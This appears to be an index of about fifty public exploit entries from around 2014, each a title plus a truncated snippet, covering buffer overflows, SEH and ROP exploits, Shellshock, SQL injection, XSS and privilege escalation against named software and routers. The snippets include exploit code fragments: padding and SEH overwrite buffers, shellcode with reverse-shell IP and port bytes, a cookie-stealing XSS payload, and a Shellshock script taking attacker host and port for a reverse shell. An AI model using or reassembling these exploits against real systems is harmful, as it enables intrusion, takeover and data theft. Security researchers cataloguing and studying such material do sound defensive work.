WRT120N-1.0.0.7
WRT120N v1.0.0.7 stack overflow, ROP to 4-byte overwrite which clears the admin password. Stack filler; needs to be 4 bytes except for the last stack frame where it needs to be 1 byte to account for the trailing "\n\n" and terminating NULL byte import sys import urllib2 try: target = sys.argv1...
PCMAN-FTP-2.07
Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow unauthenticated Date: Feb 19, 2014 Exploit Author: Sumit Version: 2.07 Tested on: Windows XP Professional SP3 Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command import socket import...
VideoCharge-Studio-2.12.3.685
Exploit Title: VideoCharge Studio v2.12.3.685 GetHttpResponse MITM Remote Code Execution Exploit SafeSEH/ASLR/DEP Bypass Version: v2.12.3.685 Date: 2014-02-19 Author: Julien Ahrens @MrTuxracer Homepage: http://www.rcesecurity.com Software Link: http://www.videocharge.com Tested on: Win7-GER DEP...
MiniHTTPd-1.21-exploit
The instability of the existing is down to bad chars, and the parent thread killing off the child thread when the thing is still running. This exploit allocates memory in a safe area, copies the payload to it, creates a new thread which runs the payload and then suspends the current thread. The...
Symantec-Endpoint-Protection-Manager
Symantec has an http request handler called ConfigServerHandler that is programmatically restricted to only handle requests that come from localhost. I guess when they wrote this they just assumed that there was never going to be a way to send untrusted input to it since it was always going to be...
python-socket.recvfrom_into()
Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-1912 import struct def offo: return struct.pack'L',o reverseIP = '\xc0\xa8\x04\x34' '\xc0\xa8\x01\x0a' reversePort = '\x7a\x69' shellcode from exploit-db.com,...
Acunetix-Web-Vulnerability-Scanner
Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/ /!\ Author is not responsible for any damage you cause This POC is for educational purposes only Video: https://www.youtube.com/watch?v=RHaMx8K1GeM while True: try: choice = intrawinput"...
Easy-Address-Book-Server-1.6
By setting UserID in the cookie to a long string, we can overwrite EDX which allows us to control execution flow when "call dword ptr edx+28h" is executed. EDX is overwritten with an address pointing to a location on the stack which in turn points to a NOP sled leading to the shellcode. This...
Easy-File-Web-Server-5.3-
This scripts exploits the buffer overflow vulnerability caused by an oversized UserID - string as discovered by superkojiman. In comparison to superkojiman's exploit, this exploit does not brute force the address of the overwritten stackpart, instead it uses code from its own .text segment to...
ZTE-and-TP-Link-RomPager
Date: 10-05-2014 Server Version: RomPager/4.07 UPnP/1.0 Tested Routers: ZTE ZXV10 W300 TP-Link TD-W8901G TP-Link TD-W8101G TP-Link TD-8840G Firmware: FwVer:3.11.2.175TC3086 HwVer:T14.F75.0 Tested on: Kali Linux x86 !/usr/bin/env python -- coding: utf-8 -- Exploit Title: ZTE and TP-Link RomPager D...
Gitlist-0.4.0
Date: 06/20/2014 Vendor Homepage: http://gitlist.org/ Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz Fixed in: 0.5.0 Tested on: Debian 7 More information: http://hatriot.github.io/blog/2014/06/29/gitlist-rce/ from commands import getoutput import urllib import sys """ Exploi...
Kolibri-WebServer-2.0-GET
Exploit Title : Kolibri WebServer 2.0 Get Request SEH Exploit Exploit Author : Revin Hadi S Date : 14/07/2014 Vendor : http://www.senkas.com Version : 2.0 import socket, sys help = """Kolibri WebServer 2.0 Get Request SEH Exploit Target 1Windows XP SP2 Eng & Windows 2003 SP2 Eng 2Windows 7 SP1 En...
Omeka-2.2.1
Desc: Omeka suffers from an authenticated arbitrary PHP code execution. The vulnerability is caused due to the improper verification of uploaded files in '/admin/items/add' script thru the 'file0' POST parameter. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP...
Oxwall-1.7.0
Oxwall suffers from an authenticated arbitrary PHP code execution. The vulnerability is caused due to the improper verification of uploaded files in '/admin/settings/user' script thru the 'avatar' and 'bigAvatar' POST parameters. This can be exploited to execute arbitrary PHP code by uploading a...
Kolibri-Webserver-2.0
This exploit will bypass all protections in EMET 5.0 and 4.1 but DEP. Date: September 30th 2014 Author: tekwizz123 Vendor Homepage: http://www.senkas.com Software Download: http://www.senkas.com/kolibri/download.php Version: 2.0 Tested on: Windows 7 32 bit, Windows 7 64 bit, Windows XP SP3 CVE-ID...
Apache-mod_cgi-Shellshock
Shellshock apache mod_cgi remote exploit rhost: victim host rport: victim port for TCP shell binding lhost: attacker host for TCP shell reversing lport: attacker port for TCP shell reversing pages: specific cgi vulnerable pages separated by comma proxy: host:port proxy ! /usr/bin/env python from...
Postfix-SMTP---Shellshock
Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/ Version: 4.2.x 4.2.48 !/bin/python Exploit Title: Shellshock SMTP Exploit Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bas...
Belkin-n750-jump-login-Parameter
Source: https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/ A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103WW1.10.16m, allows an unauthenticated remote attacker to...
Apache-James-Server-2.3.2
Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip Version: Apache James Server 2.3.2 Tested on: Ubuntu, Debian Info: This exploit works on default installation of Apache James Server 2.3.2 Info: Example paths that will automatically execute payload on some action:...
LeapFTP-3.1.0-URL-Handling
Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit Google Dork: "k3170makan is totally awesome" hehehe Date: 2014-08-28 Exploit Author: k3170makan Vendor Homepage: http://www.leapware.com/ Software Link: http://www.leapware.com/download.html Version: 3.1.0 Tested on: Windows XP SP0 DoS on...
HTML-Help-Workshop-1.4
Date: 31/08/2014 Author: mr.pr0n @pr0n Homepage: http://ghostinthelab.wordpress.com/ Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx Version: 1.4 Tested on: Windows XP SP3 / Windows 7 Pro import subprocess junk = "A" 832 Junk bytes nseh =...
Windows-OLE-Package-Manager
Very quick and ugly SandWorm CVE-2014-4114 exploit builder Exploit Title: CVE-2014-4114 SandWorm builder Vendor Homepage: microsoft.com Tested on: Win7Sp1 64 bit - Microsoft Office 2013 Plus Demo: http://youtu.be/ljjEkhflpv import os import zipfile import sys ''' Very quick and ugly SandWorm...
Free-WMA-MP3-Converter-1.8
Free WMA MP3 Converter 1.8 Buffer Overflow Version:1.8 Build 20140226 Author:metacom Date:10.23.2014 Download:http://www.eusing.com/freewmaconverter/mp3wmaconverter.htm import struct def littleendianaddress: return struct.pack"L",address poc="\x41" 4112 eip=littleendian0x0045CD1A0045CD1A FFE4 JMP...
IBM-Tivoli-Monitoring-6.2.2
Title: IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit CVE: CVE-2013-5467 Vendor Homepage: http://www-03.ibm.com/software/products/pl/tivomoni Author: Robert Jaroszuk Tested on: RedHat 5, Centos 5 Vulnerable version: IBM Tivoli Monitoring V6.2.2 other versions not tested !/bin/s...
iFTP-2.20-Buffer-Overflow-SEH
Exploit Title:i-FTP Buffer Overflow SEH Homepage:http://www.memecode.com/iftp.php Software Link:www.memecode.com/data/iftp-win32-v220.exe Version:i.Ftp v2.20 Win32 Release Vulnerability discovered:26.10.2014 Description:Simple portable cross platform FTP/SFTP/HTTP client. import struct def...
Microsoft-Office-2007-and-2010---OLE-Arbitrary-Command-Execution
CVE-2014-6352 OLE Remote Code Execution Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Tested on win7 - office 2007 and 2010...
Advantech-AdamView-GNI
!/usr/bin/env ruby Exploit Title: Advantech AdamView .gni SEH Buffer Overflow Date: Dec 09 2014 Vulnerability Discovery: Daniel Kazimirow and Fernando Paez - Core Security Exploit Author: Muhamad Fadzil Ramli mind1355atgmail.com Software Link:...
VFU-4.10-1.1---Buffer-Overflow
VFU v4.10-1.1 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a...
jaangle-0.98i.977-DoS
jaangle 0.98i.977 Denial of Service Vulnerability Author: hadji samir , [email protected] Download : http://www.jaangle.com/downloading?block Tested : Windows 7 fr DATE : 2012-12-13 buff = "\x41" 30000 f = open"exploit.m3u",'w' f.write buff f.close...
Mediacoder-0.8.33-SEH
Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos .m3u Date: 11/29/2010 Author: Hadji Samir [email protected] Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe Version: 0.8.33 build 5680 buffer = "http://" + "A" 845 nseh = "B" 4 seh = "C" 4 junk = "D" 60 f=...
Windows-8.1-ahcache.sys
On Windows 8.1 update the system call NtApphelpCacheControl the code is actually in ahcache.sys allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to...
WhatsApp-Remote-Reboot
Custom message with non-printable characters will crash any WhatsApp client v2.11.476 for android. It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even engaging in an interactive conversation over WhatsApp protocol Mirror:...
Crea8Social 2.0 - Cross-Site Scripting Change Interface
Crea8Social 2.0 - Cross-Site Scripting Change Interface Exploit Title: Crea8Social v.2.0 XSS Change Interface Google Dork: intext:Copyright © 2014 CreA8social. Date: January 3, 2015 Exploit Author: r0seMary Vendor Homepage: http://crea8social.com Software Link:...
ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution
ASUSWRT 3.0.0.4.3761071 - LAN Backdoor Command Execution !/usr/bin/env python3 Exploit Title: ASUSWRT 3.0.0.4.3761071 LAN Backdoor Command Execution Date: 2014-10-11 Vendor Homepage: http://www.asus.com/ Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66UB1/FWRTN66U30043762524.zip...
PhotoPost 4.85 - Multiple Vulnerabilities
PhotoPost 4.85 - Multiple Vulnerabilities PhotoPost Multiple Vulnerabilities Vendor: All Enthusiast, Inc. Product: PhotoPost Version: = 4.85 Website: http://www.photopost.com/ BID: 12157 CVE: CVE-2005-0273 CVE-2005-0274 OSVDB: 12741 12741 SECUNIA: 13680 PACKETSTORM: 35595 Description: PhotoPost w...
e107 2 Bootstrap CMS - Cross-Site Scripting
e107 2 Bootstrap CMS - Cross-Site Scripting alertString.fromCharCode88, 83, 83 or "alertdocument.cookie ======== Credits: ======== Vulnerability found and advisory written by Ahmet Agar. =========== References: =========== http://www.0x97.inf...
ReviewPost 2.84 - Multiple Vulnerabilities
ReviewPost 2.84 - Multiple Vulnerabilities ReviewPost Multiple Vulnerabilities Vendor: All Enthusiast, Inc. Product: ReviewPost Version: = 2.84 Website: http://www.reviewpost.com/ BID: 12159 CVE: CVE-2005-0270 CVE-2005-0271 CVE-2005-0272 OSVDB: 12703 12704 12705 12706 12707 12708 SECUNIA: 13697...
PhotoPost Classifieds 2.01 - Multiple Vulnerabilities
PhotoPost Classifieds 2.01 - Multiple Vulnerabilities PhotoPost Classifieds Multiple Vulnerabilities Vendor: All Enthusiast, Inc. Product: PhotoPost Classifieds Version: = 2.01 Website: http://www.photopost.com/class/ BID: 12156 OSVDB: 12728 12729 12730 12731 12732 12733 12734 12735 12736 12737...
Absolut Engine 1.73 - Multiple Vulnerabilities
Absolut Engine 1.73 - Multiple Vulnerabilities Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS Advisory ID: SROEADV-2014-08 Author: Steffen Rösemann Affected Software: CMS Absolut Engine v. 1.73 Vendor URL: http://www.absolutengine.com/ Vendor Status: solved...
Microsoft Windows 8.1 (x86x64) - ahcache.sys NtApphelpCacheControl Privilege Escalation
Microsoft Windows 8.1 x86x64 - ahcache.sys NtApphelpCacheControl Privilege Escalation Source: https://code.google.com/p/google-security-research/issues/detail?id=118c1 Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35661-poc.zip Platform:...
Social Microblogging PRO 1.5 - Persistent Cross-Site Scripting
Social Microblogging PRO 1.5 - Persistent Cross-Site Scripting Exploit Title: Social Microblogging PRO 1.5 Stored XSS Vulnerability Date: 29-12-2014 Exploit Author: Halil Dalabasmaz Version: v1.5 Vendor Homepage: http://codecanyon.net/item/social-microblogging-pro/9217005 Tested on: Chrome &...
Liferay Portal 7.0.0 M17.0.0 M27.0.0 M3 - Remote Code Execution
Liferay Portal 7.0.0 M17.0.0 M27.0.0 M3 - Remote Code Execution !/bin/sh Exploit title: Liferay Portal 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 RCE Date: 11/16/2014 Exploit author: drone @dronesec Vendor homepage: http://www.liferay.com/ Software link:...
PHP-Calendar 0.10.1 - Arbitrary File Inclusion
PHP-Calendar 0.10.1 - Arbitrary File Inclusion PHP-Calendar Arbitrary File Inclusion Vendor: Sean Proctor Product: PHP-Calendar Version: = 0.10.1 Website: http://php-calendar.sourceforge.net/ BID: 12127 CVE: CVE-2004-1423 OSVDB: 12700 12701 SECUNIA: 22516 PACKETSTORM: 35563 Description: I was...
Bash-CMD-Injection
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment. Modified by JSacco - [email protected] Exploit Pack 2014 How to run: checkCVE20146271.py...
WhatsApp 2.11.476 (Android) - Remote RebootCrash App (Denial of Service)
WhatsApp 2.11.476 Android - Remote RebootCrash App Denial of Service Mirror: http://pastebin.com/raw.php?i=CZChGAnG Video: https://www.youtube.com/watch?v=V7bnLOohqqI !/usr/bin/python -- coding: utf-8 - Title: WhatsApp Remote Reboot/Crash App Android Product: WhatsApp Vendor Homepage:...
Pimcore CMS 2.3.03.0 - SQL Injection
Pimcore CMS 2.3.03.0 - SQL Injection Document Title: =============== Pimcore v3.0 & v2.3.0 CMS - SQL Injection Vulnerability References Source: ==================== http://vulnerability-lab.com/getcontent.php?id=1363 Release Date: ============= 2014-12-16 Vulnerability Laboratory ID VL-ID:...
Easy File Sharing Web Server 6.8 - Persistent Cross-Site Scripting
Easy File Sharing Web Server 6.8 - Persistent Cross-Site Scripting Exploit Title: Easy File Sharing Webserver =6.8 Persistent XSS Date: 12/26/14 Exploit Author: SickPsycko Vendor Homepage: http://www.sharing-file.com/ Version:6.8 Tested on: Windows 7 32bit The exploit is within the username field...
phpList 3.0.63.0.10 - SQL Injection
phpList 3.0.63.0.10 - SQL Injection Document Title: =============== PHPLIST v3.0.6 & v3.0.10 - SQL Injection Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1358 Release Date: ============= 2014-12-18 Vulnerability Laboratory ID VL-ID:...
PMB 4.1.3 - (Authenticated) SQL Injection
PMB 4.1.3 - Authenticated SQL Injection Exploit Title: PMB = 4.1.3 Post-Auth SQL Injection Vulnerability Google Dork: inurl:opaccss Date: 25-12-2014 Exploit Author: XD4rker Ismail Belkacim Email: xd4rkeratgmail.com Twitter: @xd4rker Vendor Homepage: http://www.sigb.net Software Link:...
Wickr Desktop 2.2.1 Windows - Denial of Service
Wickr Desktop 2.2.1 Windows - Denial of Service Document Title: =============== Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1377 Video:...